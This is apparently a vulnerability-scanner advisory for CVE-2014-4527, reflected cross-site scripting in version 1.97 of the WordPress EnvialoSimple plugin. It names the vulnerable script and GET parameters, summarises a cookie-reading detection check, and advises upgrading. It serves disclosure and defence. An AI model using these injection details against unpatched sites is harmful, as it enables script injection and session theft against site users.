Summary
This host is installed with WordPress EnvialoSimple Plugin and is prone to multiple cross site scripting vulnerabilities.
Impact
Successful exploitation will allow attacker to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
Impact Level: Application
Solution
Upgrade to version 1.98 or higher,
For updates refer to http://wordpress.org/plugins/envialosimple-email-marketing-y-newsletters-gratis
Insight
Flaw is due to the paginas/vista-previa-form.php script does not validate input to the 'FormID' and 'AdministratorID' GET parameters before returning to the users.
Affected
WordPress EnvialoSimple: Email Marketing and Newsletters Plugin version 1.97, and possibly prior.
Detection
Send a crafted data via HTTP GET request and check whether it is able to read cookie or not.
References
Severity
Classification
-
CVE CVE-2014-4527 -
CVSS Base Score: 4.3
AV:N/AC:M/Au:N/C:N/I:P/A:N
Related Vulnerabilities
- 11in1 Cross Site Request Forgery and Local File Include Vulnerabilities
- Adobe BlazeDS XML and XML External Entity Injection Vulnerabilities
- Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
- APC PowerChute Network Shutdown 'security/applet' Cross Site Scripting Vulnerability
- Aardvark Topsites PHP 'index.php' Multiple Cross Site Scripting Vulnerabilities